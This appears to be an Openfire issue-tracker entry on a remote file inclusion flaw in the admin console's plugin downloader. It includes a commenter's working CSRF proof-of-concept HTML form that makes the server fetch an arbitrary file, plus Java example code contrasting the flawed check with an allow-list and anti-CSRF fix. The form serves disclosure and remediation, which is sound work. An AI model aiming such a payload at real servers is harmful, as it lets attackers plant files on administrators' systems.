Admin Console Remote File Inclusion (RFI) Vulnerability

Description

hyp3rlinx reported that Openfire v3.10.2 suffers from a Remote File Inclusion (RFI) vulnerability.

Full details: https://packetstormsecurity.com/files/133560/Openfire-3.10.2-Remote-File-Inclusion.html

Vulnerability Details:
In "available-plugins.jsp" there is no validation for plugin downloads, allowing arbitrary file downloads from anywhere on the internet.

On line 40: all that needs to be satisfied is that the parameter is not null.

If the above condition check returns true, the application downloads whatever file you give it.
line 54:

Exploit code(s):
1) Download arbitrary file, e.g.

Our RFI will then be downloaded to the "openfire\plugins" directory.

Environment

None

Activity

Tim Durden
January 4, 2016, 5:36 PM

Re-tested this on the latest Openfire 4.0.0 beta and still present.

Simon Waters
December 16, 2016, 3:38 PM

Re-tested; this is still present in 4.1 beta.

Simon Waters
December 16, 2016, 4:01 PM

Noted there is no CSRF on this, so the download of a file to the server can be initiated via CSRF against the admin's browser.

<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="https://192.168.56.103:9091/dwr/exec/downloader.installPlugin.dwr" method="POST" enctype="text/plain">
<input type="hidden" name="callCount" value="1&#10;c0&#45;scriptName&#61;downloader&#10;c0&#45;methodName&#61;installPlugin&#10;c0&#45;id&#61;576&#95;1481902916818&#10;c0&#45;param0&#61;string&#58;https&#37;3A&#37;2F&#37;2Fdownload&#46;microsoft&#46;com&#37;2Fdownload&#37;2F4&#37;2F4&#37;2F9&#37;2F449b0038&#45;ac27&#45;4b24&#45;bf11&#45;dd8ebdf5cca6&#37;2Fsonar&#95;setup&#46;exe&#10;c0&#45;param1&#61;string&#58;1164973806&#10;xml&#61;true&#10;" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
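As an added illustration of both the missing URL validation described in the report and the missing CSRF protection noted in the comment above (example code written for this page, not Openfire's own source): the null-only check beside an allow-list check of the plugin URL, plus a constant-time comparison of an anti-CSRF token. The allowed host name, the class name and the sample URLs and tokens are constructed assumptions.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.util.Set;

public final class PluginDownloadGuard {

    // Assumed allow-list of hosts the admin console may fetch plugins from (placeholder host).
    private static final Set<String> ALLOWED_HOSTS = Set.of("plugins.example.invalid");

    // Mirrors the reported check: only a missing parameter is rejected.
    static boolean vulnerableCheck(String url) {
        return url != null;
    }

    // Hardened check: parseable URL, https only, no userinfo, host on the allow-list.
    static boolean isAllowedPluginUrl(String url) {
        if (url == null || url.isBlank()) return false;
        final URI uri;
        try {
            uri = new URI(url);
        } catch (URISyntaxException e) {
            return false;
        }
        if (!"https".equalsIgnoreCase(uri.getScheme())) return false;
        if (uri.getRawUserInfo() != null) return false;   // rejects https://user@host tricks
        String host = uri.getHost();                        // null for malformed authorities
        return host != null && ALLOWED_HOSTS.contains(host.toLowerCase());
    }

    // Constant-time comparison of the per-session anti-CSRF token with the submitted one,
    // so a forged cross-site POST without the token is refused before any download starts.
    static boolean csrfTokenValid(String sessionToken, String submittedToken) {
        if (sessionToken == null || submittedToken == null) return false;
        return MessageDigest.isEqual(sessionToken.getBytes(StandardCharsets.UTF_8),
                                     submittedToken.getBytes(StandardCharsets.UTF_8));
    }

    public static void main(String[] args) {
        String untrusted = "http://attacker.invalid/backdoor.jar";       // constructed
        String trusted   = "https://plugins.example.invalid/plugin.jar"; // constructed
        System.out.println("null-only check accepts untrusted URL: " + vulnerableCheck(untrusted));
        System.out.println("allow-list accepts untrusted URL:      " + isAllowedPluginUrl(untrusted));
        System.out.println("allow-list accepts trusted URL:        " + isAllowedPluginUrl(trusted));
        System.out.println("token check with mismatched token:     " + csrfTokenValid("s3ss10n", "forged"));
    }
}
```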

Fixed

Assignee

Dave Cridland

Reporter

Tim Durden

Expected Effort

None

Ignite Forum URL

None

Components

Fix versions

Affects versions

Priority

Major